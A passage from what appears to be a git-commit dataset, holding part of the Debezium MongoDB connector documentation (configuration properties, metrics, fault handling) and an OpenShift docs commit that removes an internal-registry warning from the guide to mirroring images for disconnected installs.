Defaults to 1000 milliseconds, or 1 second.\n\n|[[mongodb-property-connect-backoff-initial-delay-ms]]<<mongodb-property-connect-backoff-initial-delay-ms, `+connect.backoff.initial.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the initial delay when trying to reconnect to a primary after the first failed connection attempt or when no primary is available. Defaults to 1 second (1000 ms).\n\n|[[mongodb-property-connect-backoff-max-delay-ms]]<<mongodb-property-connect-backoff-max-delay-ms, `+connect.backoff.max.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the maximum delay when trying to reconnect to a primary after repeated failed connection attempts or when no primary is available. Defaults to 120 seconds (120,000 ms).\n\n|[[mongodb-property-connect-max-attempts]]<<mongodb-property-connect-max-attempts, `+connect.max.attempts+`>>\n|`16`\n|Positive integer value that specifies the maximum number of failed connection attempts to a replica set primary before an exception occurs and task is aborted. Defaults to 16, which with the defaults for `connect.backoff.initial.delay.ms` and `connect.backoff.max.delay.ms` results in just over 20 minutes of attempts before failing.\n\n|[[mongodb-property-mongodb-members-auto-discover]]<<mongodb-property-mongodb-members-auto-discover, `+mongodb.members.auto.discover+`>>\n|`true`\n|Boolean value that specifies whether the addresses in 'mongodb.hosts' are seeds that should be used to discover all members of the cluster or replica set (`true`), or whether the address(es) in `mongodb.hosts` should be used as is (`false`). The default is `true` and should be used in all cases except where MongoDB is xref:{link-mongodb-connector}#mongodb-replicaset[fronted by a proxy].\n\nifdef::community[]\n|[[mongodb-property-source-struct-version]]<<mongodb-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events. {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mongodb-property-heartbeat-interval-ms]]<<mongodb-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages into a heartbeat topic.\nThis can be used to monitor whether the connector is still receiving change events from the database.\nYou also should leverage heartbeat messages in cases where only records in non-captured collections are changed for a longer period of time.\nIn such situation the connector would proceed to read the oplog\/change stream from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis will cause the oplog files to be rotated out but connector will not notice it so on restart some events are no longer available which leads to the need of re-execution of the initial snapshot.\n\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[mongodb-property-sanitize-field-names]]<<mongodb-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nifdef::community[]\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\nendif::community[]\n\n|[[mongodb-property-skipped-operations]]<<mongodb-property-skipped-operations, `+skipped.operations+`>>\n|\n| comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[mongodb-property-snapshot-collection-filter-overrides]]<<mongodb-property-snapshot-collection-filter-overrides, `+snapshot.collection.filter.overrides+`>>\n|\n| Controls which collection items are included in snapshot. This property affects snapshots only. Specify a comma-separated list of collection names in the form _databaseName.collectionName_.\n\nFor each collection that you specify, also specify another configuration property: `snapshot.collection.filter.overrides._databaseName_._collectionName_`. For example, the name of the other configuration property might be: `snapshot.collection.filter.overrides.customers.orders`. Set this property to a valid filter expression that retrieves only the items that you want in the snapshot. When the connector performs a snapshot, it retrieves only the items that matches the filter expression.\n\n\n|[[mongodb-property-provide-transaction-metadata]]<<mongodb-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true` {prodname} generates events with transaction boundaries and enriches data events envelope with transaction metadata.\n\nSee xref:{link-mongodb-connector}#mongodb-transaction-metadata[Transaction Metadata] for additional details.\n\n|[[mongodb-property-retriable-restart-connector-wait-ms]]<<mongodb-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|[[mongodb-property-mongodb-poll-interval-ms]]<<mongodb-property-mongodb-poll-interval-ms, `+mongodb.poll.interval.ms+`>>\n|`30000`\n|The interval in which the connector polls for new, removed, or changed replica sets.\n\n|[[mongodb-property-mongodb-connect-timeout-ms]]<<mongodb-property-mongodb-connect-timeout-ms, `+mongodb.connect.timeout.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds the driver will wait before a new connection attempt is aborted.\n\n|[[mongodb-property-mongodb-socket-timeout-ms]]<<mongodb-property-mongodb-socket-timeout-ms, `+mongodb.socket.timeout.ms+`>>\n|0\n|The number of milliseconds before a send\/receive on the socket can take before a timeout occurs.\nA value of `0` disables this behavior.\n\n|[[mongodb-property-mongodb-server-selection-timeout-ms]]<<mongodb-property-mongodb-server-selection-timeout-ms, `+mongodb.server.selection.timeout.ms+`>>\n|30000 (30 seconds)\n|The number of milliseconds the driver will wait to select a server before it times out and throws an error.\n\n|[[mongodb-property-cursor-max-await-time-ms]]<<mongodb-property-cursor-max-await-time-ms, `+cursor.max.await.time.ms+`>>\n|`0`\n|Specifies the maximum number of milliseconds the oplog\/change stream cursor will wait for the server to produce a result before causing an execution timeout exception.\nA value of `0` indicates using the server\/driver default wait timeout.\n\n|[[mongodb-property-signal-data-collection]]<<mongodb-property-signal-data-collection, `+signal.data.collection+`>>\n|No default\n| Fully-qualified name of the data collection that is used to send {link-prefix}:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector.\nUse the following format to specify the collection name: +\n`_<databaseName>_._<collectionName>_` +\nifdef::product[]\nSignaling is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-incremental-snapshot-chunk-size]]<<mongodb-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of documents that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment. +\nifdef::product[]\nIncremental snapshots is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-topic-naming-strategy]]<<mongodb-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.DefaultTopicNamingStrategy`\n|The name of the TopicNamingStrategy class that should be used to determine the topic name for data change, schema change, transaction, heartbeat event etc., defaults to `DefaultTopicNamingStrategy`.\n\n|[[mongodb-property-topic-delimiter]]<<mongodb-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specify the delimiter for topic name, defaults to `.`.\n\n|[[mongodb-property-topic-prefix]]<<mongodb-property-topic-prefix, `topic.prefix`>>\n|`${mongodb.name}`\n|The name of the prefix to be used for all topics, defaults to xref:mongodb-property-mongodb-name[`${mongodb.name}`].\n[NOTE]\n====\nOnce specify the prefix value to this property, the xref:mongodb-property-mongodb-name[`${mongodb.name}`] will not play the prefix role of all topics.\n====\n\n|[[mongodb-property-topic-cache-size]]<<mongodb-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size used for holding the topic names in bounded concurrent hash map. This cache will help to determine the topic name corresponding to a given data collection.\n\n|[[mongodb-property-topic-heartbeat-prefix]]<<mongodb-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mongodb-property-topic-transaction]]<<mongodb-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-performance\n\/\/ Title: Monitoring {prodname} MongoDB connector performance\n[[mongodb-monitoring]]\n== Monitoring\n\nThe {prodname} MongoDB connector has two metric types in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect have.\n\n* xref:{link-mongodb-connector}#mongodb-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* xref:{link-mongodb-connector}#mongodb-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nThe xref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details about how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-mongodb-snapshots\n\/\/ Title: Monitoring {prodname} during MongoDB snapshots\n[[mongodb-snapshot-metrics]]\n=== Snapshot Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom snapshot metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-record-streaming\n\/\/ Title: Monitoring {prodname} MongoDB connector record streaming\n[[mongodb-streaming-metrics]]\n=== Streaming Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom streaming metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|`NumberOfPrimaryElections`\n|`long`\n|Number of primary node elections.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mongodb-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MongoDB connectors handle faults and problems\n[[mongodb-when-things-go-wrong]]\n== MongoDB connector common issues\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event.\nWhen the system is operating normally and is managed carefully, then {prodname} provides _exactly once_ delivery of every change event.\n\nIf a fault occurs, the system does not lose any events.\nHowever, while it is recovering from the fault, it might repeat some change events.\nIn such situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector handles various kinds of faults and problems.\n\n* xref:debezium-mongodb-connector-configuration-and-startup-errors[]\n* xref:mongodb-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mongodb-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mongodb-kafka-connect-process-crashes[]\n* xref:debezium-mongodb-kafka-process-becomes-unavailable[]\n* xref:debezium-mongodb-connector-is-stopped-for-a-long-interval[]\n* xref:mongodb-crash-results-in-lost-commits[]\n\nendif::product[]\n\n[id=\"debezium-mongodb-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to MongoDB by using the specified connection parameters.\n\nAfter a failure, the connector attempts to reconnect by using exponential backoff.\nYou can configure the maximum number of reconnection attempts.\n\nIn these cases, the error will have more details about the problem and possibly a suggested work around. The connector can be restarted when the configuration has been corrected or the MongoDB problem has been addressed.\n\n[id=\"mongodb-becomes-unavailable-while-debezium-is-running\"]\n=== MongoDB becomes unavailable\n\nOnce the connector is running, if the primary node of any of the MongoDB replica sets become unavailable or unreachable, the connector will repeatedly attempt to reconnect to the primary node, using exponential backoff to prevent saturating the network or servers. If the primary remains unavailable after the configurable number of connection attempts, the connector will fail.\n\nThe attempts to reconnect are controlled by three properties:\n\n* `connect.backoff.initial.delay.ms` - The delay before attempting to reconnect for the first time, with a default of 1 second (1000 milliseconds).\n* `connect.backoff.max.delay.ms` - The maximum delay before attempting to reconnect, with a default of 120 seconds (120,000 milliseconds).\n* `connect.max.attempts` - The maximum number of attempts before an error is produced, with a default of 16.\n\nEach delay is double that of the prior delay, up to the maximum delay. Given the default values, the following table shows the delay for each failed connection attempt and the total accumulated time before failure.\n\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|Reconnection attempt number\n|Delay before attempt, in seconds\n|Total delay before attempt, in minutes and seconds\n\n|1 |1 |00:01\n|2 |2 |00:03\n|3 |4 |00:07\n|4 |8 |00:15\n|5 |16 |00:31\n|6 |32 |01:03\n|7 |64 |02:07\n|8 |120|04:07\n|9 |120|06:07\n|10 |120|08:07\n|11 |120|10:07\n|12 |120|12:07\n|13 |120|14:07\n|14 |120|16:07\n|15 |120|18:07\n|16 |120|20:07\n|===\n\n[id=\"debezium-mongodb-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that processes Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off.\nThere is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\nIf the group contains only one process and that process is stopped gracefully, then Kafka Connect will stop the connector and record the last offset for each replica set. Upon restart, the replica set tasks will continue exactly where they left off.\n\n[id=\"debezium-mongodb-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, then any connector tasks it was running will terminate without recording their most recently-processed offsets.\nWhen Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes.\nHowever, the MongoDB connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash.\nThe number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\n[NOTE]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate some events may be duplicated. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\n{prodname} also includes with each change event message the source-specific information about the origin of the event, including the MongoDB event's unique transaction identifier (`h`) and timestamp (`sec` and `ord`). Consumers can keep track of other of these values to know whether it has already seen a particular event.\n====\n\n[id=\"debezium-mongodb-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency that you have specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n[id=\"debezium-mongodb-connector-is-stopped-for-a-long-interval\"]\n=== Connector is stopped for a long interval\n\nIf the connector is gracefully stopped, the replica sets can continue to be used and any new changes are recorded in MongoDB's oplog.\nWhen the connector is restarted, it will resume streaming changes for each replica set where it last left off, recording change events for all of the changes that were made while the connector was stopped.\nIf the connector is stopped long enough such that MongoDB purges from its oplog some operations that the connector has not read, then upon startup the connector will perform a snapshot.\n\nA properly configured Kafka cluster is capable of massive throughput.\nKafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events.\nBecause of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MongoDB.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MongoDB might purge older oplog files and the connector's last position may be lost.\nIn this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MongoDB server will no longer have the starting point and the connector will fail with an error.\n====\n\n[id=\"mongodb-crash-results-in-lost-commits\"]\n=== MongoDB loses writes\n\nIn certain failure situations, MongoDB can lose commits, which results in the MongoDB connector being unable to capture the lost changes.\nFor example, if the primary crashes suddenly after it applies a change and records the change to its oplog, the oplog might become unavailable before secondary nodes can read its contents.\nAs a result, the secondary node that is elected as the new primary node might be missing the most recent changes from its oplog.\n\nAt this time, there is no way to prevent this side effect in MongoDB.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68ab1e00d5c14a6594f0bdf20ecf4eccb1ca00c4","subject":"Removed Important block from Mirroring images for a disconnected installation prerequisites","message":"Removed Important block from Mirroring images for a disconnected installation prerequisites\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing-mirroring-installation-images.adoc","new_file":"installing\/installing-mirroring-installation-images.adoc","new_contents":"[id=\"installing-mirroring-installation-images\"]\n= Mirroring images for a disconnected installation\ninclude::modules\/common-attributes.adoc[]\n:context: installing-mirroring-installation-images\n\ntoc::[]\n\nBefore you install a cluster on infrastructure that you provision in a restricted network, you must mirror the required container images into that environment. You can also use this procedure in unrestricted networks to ensure your clusters only use container images that have satisfied your organizational controls on external content.\n\n[IMPORTANT]\n====\nYou must have access to the internet to obtain the necessary container images.\nIn this procedure, you place the mirror registry on a mirror host\nthat has access to both your network and the Internet. If you do not have access\nto a mirror host, use the disconnected procedure to copy images to a device you\ncan move across network boundaries with.\n====\n\n[id=\"prerequisites_installing-mirroring-installation-images\"]\n== Prerequisites\n\n* You must have a container image registry that supports link:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2] in the location that will host the {product-title} cluster, such as one of the following registries:\n+\n--\n** link:https:\/\/www.redhat.com\/en\/technologies\/cloud-computing\/quay[Red Hat Quay]\n** link:https:\/\/jfrog.com\/artifactory\/[JFrog Artifactory]\n** link:https:\/\/www.sonatype.com\/products\/repository-oss?topnav=true[Sonatype Nexus Repository]\n** link:https:\/\/goharbor.io\/[Harbor]\n--\n\nIf you have an entitlement to Red Hat Quay, see the documentation on deploying Red Hat Quay link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_for_proof-of-concept_non-production_purposes\/[for proof-of-concept purposes] or link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_on_openshift_with_the_quay_operator\/[by using the Quay Operator]. If you need additional assistance selecting and installing a registry, contact your sales representative or Red Hat support.\n\ninclude::modules\/installation-about-mirror-registry.adoc[leveloffset=+1]\n\n.Additional information\n\nFor information on viewing the CRI-O logs to view the image source, see xref:..\/installing\/validating-an-installation.html#viewing-the-image-pull-source_validating-an-installation[Viewing the image pull source].\n\n[id=\"installing-preparing-mirror\"]\n== Preparing your mirror host\n\nBefore you perform the mirror procedure, you must prepare the host to retrieve content\nand push it to the remote location.\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-adding-registry-pull-secret.adoc[leveloffset=+1]\n\n\/\/This command seems out of place. Where should it really go?\n\/\/\/\/\n[id=\"installing-performing-connected-mirror\"]\n== Performing a mirror while connected to the internet\n\n$ oc adm release mirror OPENSHIFT_VERSION --to MIRROR_REPOSITORY\n\/\/\/\/\n\n\/\/\/\/\n[id=\"installing-restricted-networks-preparations-mirroring\"]\n== Mirroring the content\n\nIn production environments, add the required images to a registry in your restricted network. For non-production environments, you can use the images without a separate registry.\n\n modules\/installation-performing-disconnected-mirror.adoc[leveloffset=+2]\n\n modules\/installation-performing-disconnected-mirror-without-registry.adoc[leveloffset=+2]\n\/\/\/\/\n\ninclude::modules\/installation-mirror-repository.adoc[leveloffset=+1]\n\n[id=\"installing-preparing-samples-operator\"]\n== The Cluster Samples Operator in a disconnected environment\n\nIn a disconnected environment, you must take additional steps after you install a cluster to configure the Cluster Samples Operator. Review the following information in preparation.\n\ninclude::modules\/installation-images-samples-disconnected-mirroring-assist.adoc[leveloffset=+2]\n\ninclude::modules\/olm-mirroring-catalog.adoc[leveloffset=+1]\n.Additional resources\n\n* xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-restricted-networks[Using Operator Lifecycle Manager on restricted networks]\n\n[id=\"olm-mirror-catalog-prerequisites_installing-mirroring-installation-images\"]\n=== Prerequisites\n\nMirroring Operator catalogs for use with disconnected clusters has the following prerequisites:\n\n* Workstation with unrestricted network access.\n* `podman` version 1.9.3 or later.\n* If you want to filter, or _prune_, the default catalog and selectively mirror only a subset of Operators, see the following sections:\n** xref:..\/cli_reference\/opm\/cli-opm-install.adoc#cli-opm-install[Installing the opm CLI]\n** xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-pruning-index-image_olm-restricted-networks[Filtering a SQLite-based index image]\nifndef::openshift-origin[]\n* If you want to mirror a Red Hat-provided catalog, run the following command on your workstation with unrestricted network access to authenticate with `registry.redhat.io`:\n+\n[source,terminal]\n----\n$ podman login registry.redhat.io\n----\nendif::[]\n* Access to a mirror registry that supports\nlink:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2].\n* On your mirror registry, decide which namespace to use for storing mirrored Operator content. For example, you might create an `olm-mirror` namespace.\n* If your mirror registry does not have internet access, connect removable media to your workstation with unrestricted network access.\n* If you are working with private registries, including `registry.redhat.io`, set the `REG_CREDS` environment variable to the file path of your registry credentials for use in later steps. For example, for the `podman` CLI:\n+\n[source,terminal]\n----\n$ REG_CREDS=${XDG_RUNTIME_DIR}\/containers\/auth.json\n----\n\ninclude::modules\/olm-mirroring-catalog-extracting.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-colocated.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-airgapped.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-manifests.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-post.adoc[leveloffset=+2]\n.Additional resources\n\n* xref:..\/post_installation_configuration\/preparing-for-users.adoc#post-install-mirrored-catalogs[Populating OperatorHub from mirrored Operator catalogs]\n\n[id=\"next-steps_installing-mirroring-installation-images\"]\n== Next steps\n\n\/\/* TODO need to add the registry secret to the machines, which is different\n\n* Install a cluster on infrastructure that you provision in your restricted network, such as on\nxref:..\/installing\/installing_vsphere\/installing-restricted-networks-vsphere.adoc#installing-restricted-networks-vsphere[VMware vSphere],\nxref:..\/installing\/installing_bare_metal\/installing-restricted-networks-bare-metal.adoc#installing-restricted-networks-bare-metal[bare metal], or xref:..\/installing\/installing_aws\/installing-restricted-networks-aws.adoc#installing-restricted-networks-aws[Amazon Web Services].\n\n[id=\"restricted-networks-additional-resources\"]\n== Additional resources\n\n* See xref:..\/support\/gathering-cluster-data.adoc#gathering-data-specific-features_gathering-cluster-data[Gathering data about specific features] for more information about using must-gather.\n","old_contents":"[id=\"installing-mirroring-installation-images\"]\n= Mirroring images for a disconnected installation\ninclude::modules\/common-attributes.adoc[]\n:context: installing-mirroring-installation-images\n\ntoc::[]\n\nBefore you install a cluster on infrastructure that you provision in a restricted network, you must mirror the required container images into that environment. You can also use this procedure in unrestricted networks to ensure your clusters only use container images that have satisfied your organizational controls on external content.\n\n[IMPORTANT]\n====\nYou must have access to the internet to obtain the necessary container images.\nIn this procedure, you place the mirror registry on a mirror host\nthat has access to both your network and the Internet. If you do not have access\nto a mirror host, use the disconnected procedure to copy images to a device you\ncan move across network boundaries with.\n====\n\n[id=\"prerequisites_installing-mirroring-installation-images\"]\n== Prerequisites\n\n* You must have a container image registry that supports link:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2] in the location that will host the {product-title} cluster, such as one of the following registries:\n+\n--\n** link:https:\/\/www.redhat.com\/en\/technologies\/cloud-computing\/quay[Red Hat Quay]\n** link:https:\/\/jfrog.com\/artifactory\/[JFrog Artifactory]\n** link:https:\/\/www.sonatype.com\/products\/repository-oss?topnav=true[Sonatype Nexus Repository]\n** link:https:\/\/goharbor.io\/[Harbor]\n--\n+\n[IMPORTANT]\n====\nThe internal registry of the {product-title} cluster cannot be used as the target registry because it does not support pushing without a tag, which is required during the mirroring process.\n====\n\nIf you have an entitlement to Red Hat Quay, see the documentation on deploying Red Hat Quay link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_for_proof-of-concept_non-production_purposes\/[for proof-of-concept purposes] or link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_on_openshift_with_the_quay_operator\/[by using the Quay Operator]. If you need additional assistance selecting and installing a registry, contact your sales representative or Red Hat support.\n\ninclude::modules\/installation-about-mirror-registry.adoc[leveloffset=+1]\n\n.Additional information\n\nFor information on viewing the CRI-O logs to view the image source, see xref:..\/installing\/validating-an-installation.html#viewing-the-image-pull-source_validating-an-installation[Viewing the image pull source].\n\n[id=\"installing-preparing-mirror\"]\n== Preparing your mirror host\n\nBefore you perform the mirror procedure, you must prepare the host to retrieve content\nand push it to the remote location.\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-adding-registry-pull-secret.adoc[leveloffset=+1]\n\n\/\/This command seems out of place. Where should it really go?\n\/\/\/\/\n[id=\"installing-performing-connected-mirror\"]\n== Performing a mirror while connected to the internet\n\n$ oc adm release mirror OPENSHIFT_VERSION --to MIRROR_REPOSITORY\n\/\/\/\/\n\n\/\/\/\/\n[id=\"installing-restricted-networks-preparations-mirroring\"]\n== Mirroring the content\n\nIn production environments, add the required images to a registry in your restricted network. For non-production environments, you can use the images without a separate registry.\n\n modules\/installation-performing-disconnected-mirror.adoc[leveloffset=+2]\n\n modules\/installation-performing-disconnected-mirror-without-registry.adoc[leveloffset=+2]\n\/\/\/\/\n\ninclude::modules\/installation-mirror-repository.adoc[leveloffset=+1]\n\n[id=\"installing-preparing-samples-operator\"]\n== The Cluster Samples Operator in a disconnected environment\n\nIn a disconnected environment, you must take additional steps after you install a cluster to configure the Cluster Samples Operator. Review the following information in preparation.\n\ninclude::modules\/installation-images-samples-disconnected-mirroring-assist.adoc[leveloffset=+2]\n\ninclude::modules\/olm-mirroring-catalog.adoc[leveloffset=+1]\n.Additional resources\n\n* xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-restricted-networks[Using Operator Lifecycle Manager on restricted networks]\n\n[id=\"olm-mirror-catalog-prerequisites_installing-mirroring-installation-images\"]\n=== Prerequisites\n\nMirroring Operator catalogs for use with disconnected clusters has the following prerequisites:\n\n* Workstation with unrestricted network access.\n* `podman` version 1.9.3 or later.\n* If you want to filter, or _prune_, the default catalog and selectively mirror only a subset of Operators, see the following sections:\n** xref:..\/cli_reference\/opm\/cli-opm-install.adoc#cli-opm-install[Installing the opm CLI]\n** xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-pruning-index-image_olm-restricted-networks[Filtering a SQLite-based index image]\nifndef::openshift-origin[]\n* If you want to mirror a Red Hat-provided catalog, run the following command on your workstation with unrestricted network access to authenticate with `registry.redhat.io`:\n+\n[source,terminal]\n----\n$ podman login registry.redhat.io\n----\nendif::[]\n* Access to a mirror registry that supports\nlink:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2].\n* On your mirror registry, decide which namespace to use for storing mirrored Operator content. For example, you might create an `olm-mirror` namespace.\n* If your mirror registry does not have internet access, connect removable media to your workstation with unrestricted network access.\n* If you are working with private registries, including `registry.redhat.io`, set the `REG_CREDS` environment variable to the file path of your registry credentials for use in later steps. For example, for the `podman` CLI:\n+\n[source,terminal]\n----\n$ REG_CREDS=${XDG_RUNTIME_DIR}\/containers\/auth.json\n----\n\ninclude::modules\/olm-mirroring-catalog-extracting.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-colocated.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-airgapped.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-manifests.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-post.adoc[leveloffset=+2]\n.Additional resources\n\n* xref:..\/post_installation_configuration\/preparing-for-users.adoc#post-install-mirrored-catalogs[Populating OperatorHub from mirrored Operator catalogs]\n\n[id=\"next-steps_installing-mirroring-installation-images\"]\n== Next steps\n\n\/\/* TODO need to add the registry secret to the machines, which is different\n\n* Install a cluster on infrastructure that you provision in your restricted network, such as on\nxref:..\/installing\/installing_vsphere\/installing-restricted-networks-vsphere.adoc#installing-restricted-networks-vsphere[VMware vSphere],\nxref:..\/installing\/installing_bare_metal\/installing-restricted-networks-bare-metal.adoc#installing-restricted-networks-bare-metal[bare metal], or 